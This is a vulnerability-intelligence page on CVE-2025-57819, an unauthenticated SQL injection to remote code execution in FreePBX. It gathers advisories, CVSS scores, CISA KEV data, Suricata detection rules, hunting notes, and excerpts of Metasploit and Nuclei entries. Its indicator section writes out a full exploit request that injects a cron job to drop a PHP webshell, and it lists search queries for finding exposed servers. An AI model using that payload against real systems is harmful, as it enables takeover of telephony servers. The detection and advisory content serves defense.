CVE-2025-57819
published 2025-08-28CVE-2025-57819: FreePBX is an open-source web-based graphical user interface. FreePBX 15, 16, and 17 endpoints are vulnerable due to insufficiently sanitized user-supplied…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-09-19
Exploited in the wild
EPSS
93.29%
99.8th percentile
FreePBX is an open-source web-based graphical user interface. FreePBX 15, 16, and 17 endpoints are vulnerable due to insufficiently sanitized user-supplied data allowing unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution. This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freepbx | endpoint | < 15.0.66 | 15.0.66 |
| freepbx | endpoint | < 16.0.89 | 16.0.89 |
| freepbx | endpoint | < 17.0.3 | 17.0.3 |
| sangoma | freepbx | >= 15.0 < 15.0.66 | 15.0.66 |
| sangoma | freepbx | >= 16.0 < 16.0.89 | 16.0.89 |
| sangoma | freepbx | >= 17.0 < 17.0.3 | 17.0.3 |
Detection & IOCsextracted from sources · hover to see the quote
path/var/log/asterisk/freepbx_security.log
commandGET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'%20;INSERT%20INTO%20cron_jobs%20(modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)%20VALUES%20('sysadmin','{{username}}','echo%20%22{{cmd}}%22%7Cbase64%20-d%20%3E/var/www/html/{{filename}}.php',NULL,'*%20*%20*%20*%20*',30,1,1)%20--%20
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:15; content:"/admin/ajax.php"; fast_pattern; http.request_body; content:"module|3d|"; content:"command|3d|"; content:"model|3d|"; content:"template|3d|"; content:"brand|3d|"; pcre:"/^[^<]*?(?:\x27|%27|-{2}|%2d%2d)?(?:(?:S(?:HOW.+(?:C(?:UR(?:DAT|TIM)E|HARACTER.+SET)|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER|SLEEP|CONCAT|CASE))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|(?:NULL(?:\x2c|%2[cC])){2,}|(?:\x2f|%2[fF])(?:\x2a|%2[aA]).+(?:\x2a|%2[aA]).+(?:\x2f|%2[fF])|CONCAT.+SELECT|EXTRACTVALUE|UNION.+ALL)/i"; reference:url,labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/; reference:cve,2025-57819; classtype:attempted-admin; sid:2064717; rev:1;)snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/admin/ajax.php|3f|"; fast_pattern; startswith; content:"module|3d|"; content:"command|3d|"; content:"model|3d|"; content:"template|3d|"; content:"brand|3d|"; pcre:"/^[^<]*?(?:\x27|%27|-{2}|%2d%2d)?(?:(?:S(?:HOW.+(?:C(?:UR(?:DAT|TIM)E|HARACTER.+SET)|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER|SLEEP|CONCAT|CASE))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|(?:NULL(?:\x2c|%2[cC])){2,}|(?:\x2f|%2[fF])(?:\x2a|%2[aA]).+(?:\x2a|%2[aA]).+(?:\x2f|%2[fF])|CONCAT.+SELECT|EXTRACTVALUE|UNION.+ALL)/i"; reference:url,labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/; reference:cve,2025-57819; classtype:attempted-admin; sid:2064719; rev:1;)- →Probe for the backdoor cleanup script dropped during 0-day exploitation by requesting /.clean.sh and matching on keywords present in the response body.
- →Detect SQLi exploitation attempts against /admin/ajax.php by matching the EXTRACTVALUE-based error-based injection response pattern in the body.
- →The exploit inserts a cron job into the `cron_jobs` table via SQL injection to schedule a base64-decoded PHP webshell written to /var/www/html/; monitor for unexpected rows in cron_jobs with schedule '* * * * *' and commands containing base64 decode pipes.
- →The RCE payload is a self-deleting PHP webshell that emits the response header 'x_poc: CVE-2025-57819'; hunt for this header in HTTP logs as a confirmation of successful exploitation.
- →Use Shodan/FOFA favicon hashes to identify exposed FreePBX instances that may be targeted.
- →The Metasploit module exploits the FreePBX database user's ability to schedule cronjobs; monitor for new cron entries created by the database user (e.g., asterisk or freepbx DB user) as a post-exploitation indicator. ↗
- ·The Nuclei RCE template uses a 70-second wait (timeout 80s) before fetching the dropped PHP webshell, because the payload is executed via a cron job scheduled at '* * * * *' (every minute); detection timing must account for this delay.
- ·The Nuclei template flow is 'http(1) || http(2) && http(3) && http(4)', meaning SQLi detection (step 1) is independent of the RCE chain (steps 2–4); operators should be aware that step 1 alone does not confirm RCE.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.010.0CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulnCheck
Sangoma FreePBX Authentication Bypass Vulnerability
vulncheck·2025·CVSS 10.0
CVE-2025-57819 [CRITICAL] CWE-89 Sangoma FreePBX Authentication Bypass Vulnerability
Sangoma FreePBX Authentication Bypass Vulnerability
Sangoma FreePBX contains an authentication bypass vulnerability due to insufficiently sanitized user-supplied data allows unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution.
Affected: Sangoma FreePBX
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://x.com/Ransom_DB/status/1961308995286606082; https://www.security.nl/posting/903088/%27Hond
CISA
Sangoma FreePBX Authentication Bypass Vulnerability
cisa·2025-08-29·CVSS 10.0
CVE-2025-57819 [CRITICAL] CWE-89 Sangoma FreePBX Authentication Bypass Vulnerability
Vulnerability: Sangoma FreePBX Authentication Bypass Vulnerability
Affected: Sangoma FreePBX
Sangoma FreePBX contains an authentication bypass vulnerability due to insufficiently sanitized user-supplied data allows unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h ; https://nvd.nist.gov/vuln/detail/CVE-2025-57819
Remediation Due Date: 2025-09-19
Suricata
ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M1
suricata·2025-09-16·CVSS 10.0
CVE-2025-57819 [CRITICAL] ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M1
ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M1
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:15; content:"/admin/ajax.php"; fast_pattern; http.request_body; content:"module|3d|"; content:"command|3d|"; content:"model|3d|"; content:"template|3d|"; content:"brand|3d|"; pcre:"/^[^<]*?(?:\x27|%27|-{2}|%2d%2d)?(?:(?:S(?:HOW.+(?:C(?:UR(?:DAT|TIM)E|HARACTER.+SET)|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER|SLEEP|CONCAT|CASE))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.
Suricata
ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M2
suricata·2025-09-16·CVSS 10.0
CVE-2025-57819 [CRITICAL] ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M2
ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M2
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/admin/ajax.php|3f|"; fast_pattern; startswith; content:"module|3d|"; content:"command|3d|"; content:"model|3d|"; content:"template|3d|"; content:"brand|3d|"; pcre:"/^[^<]*?(?:\x27|%27|-{2}|%2d%2d)?(?:(?:S(?:HOW.+(?:C(?:UR(?:DAT|TIM)E|HARACTER.+SET)|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER|SLEEP|CONCAT|CASE))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|(?:NULL(
Metasploit
FreePBX ajax.php unauthenticated SQLi to RCE
metasploit
FreePBX ajax.php unauthenticated SQLi to RCE
FreePBX ajax.php unauthenticated SQLi to RCE
This module exploits an unauthenticated SQL injection flaw in FreePBX prior to versions 15.0.66, 16.0.89, and 17.0.3. The vulnerability lies in the /admin/ajax.php endpoint, which is accessible without authentication. Additionally, the database user created by FreePBX can schedule cronjobs, allowing remote code execution on the target system.
Nuclei
FreePBX - CVE-2025-57819 Backdoor
nuclei·CVSS 10.0
CVE-2025-57819 [CRITICAL] FreePBX - CVE-2025-57819 Backdoor
FreePBX - CVE-2025-57819 Backdoor
FreePBX backdoor cleanup script used in 0-day exploitation of CVE-2025-57819 was detected.
Template:
id: freepbx-cleanup-backdoor
info:
name: FreePBX - CVE-2025-57819 Backdoor
severity: high
author: darses
description: |
FreePBX backdoor cleanup script used in 0-day exploitation of CVE-2025-57819 was detected.
metadata:
verified: true
max-request: 1
vendor: sangoma
product: freepbx
shodan-query:
- http.title:"FreePBX"
- http.favicon.hash:-1908328911
- http.favicon.hash:1574423538
fofa-query:
- title="FreePBX"
- icon_hash="-1908328911"
- icon_hash="1574423538"
reference:
- https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203
tags: backdoor,sangoma,freepbx,vuln
http:
- method: GET
path:
- "{{BaseURL}}/.clea
Nuclei
FreePBX - Remote Code Execution
nuclei·CVSS 10.0
CVE-2025-57819 [CRITICAL] FreePBX - Remote Code Execution
FreePBX - Remote Code Execution
FreePBX 15, 16, and 17 contain a remote code execution caused by insufficiently sanitized user-supplied data in endpoints, letting unauthenticated attackers manipulate the database and execute code remotely, exploit requires no authentication.
Template:
id: CVE-2025-57819
info:
name: FreePBX - Remote Code Execution
author: watchtowr,pussycat0x,DhiyaneshDk
severity: critical
description: |
FreePBX 15, 16, and 17 contain a remote code execution caused by insufficiently sanitized user-supplied data in endpoints, letting unauthenticated attackers manipulate the database and execute code remotely, exploit requires no authentication.
impact: |
Unauthenticated attackers can manipulate database records through SQL injection and achieve remote code execution thro
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
NoiseLetter September 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
August 2025 CVE Landscape
blogs_recorded_future·CVSS 8.8
[HIGH] August 2025 CVE Landscape
# August 2025 CVE Landscape
In August 2025, Recorded Future’s Insikt Group® identified eighteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the 22 identified in July.
However, the number of Very Critical vulnerabilities has remained the same (16) compared to July. These vulnerabilities have affected the following vendors: Trend Micro, WinRAR, N-able, Cisco, Apple, Citrix, FreePBX, Git, Microsoft, D-Link, and Fortinet.
August was dominated by Citrix and D-Link flaws, which represented six of the eighteen vulnerabilities. Threat actors actively exploited Citrix NetScaler ADC, NetScaler Gateway, and Citrix Session Recording products, as well as D-Link DNR-322L and DCS-2530L routers.
Recorded Future Insikt Group’s CVE Findings fro
Recorded Future
August 2025 CVE Landscape
blogs_recorded_future·CVSS 8.8
[HIGH] August 2025 CVE Landscape
## August 2025 CVE Landscape
In August 2025, Recorded Future’s Insikt Group ® identified eighteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the 22 identified in July.
However, the number of Very Critical vulnerabilities has remained the same (16) compared to July. These vulnerabilities have affected the following vendors: Trend Micro, WinRAR, N-able, Cisco, Apple, Citrix, FreePBX, Git, Microsoft, D-Link, and Fortinet.
August was dominated by Citrix and D-Link flaws, which represented six of the eighteen vulnerabilities. Threat actors actively exploited Citrix NetScaler ADC, NetScaler Gateway, and Citrix Session Recording products, as well as D-Link DNR-322L and DCS-2530L routers.
Recorded Future Insikt Group’s CVE Findings f
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
NoiseLetter February 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3hhttps://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-57819
2025-08-28
Published
2025-08-29
Added to CISA KEV
Exploited in the wild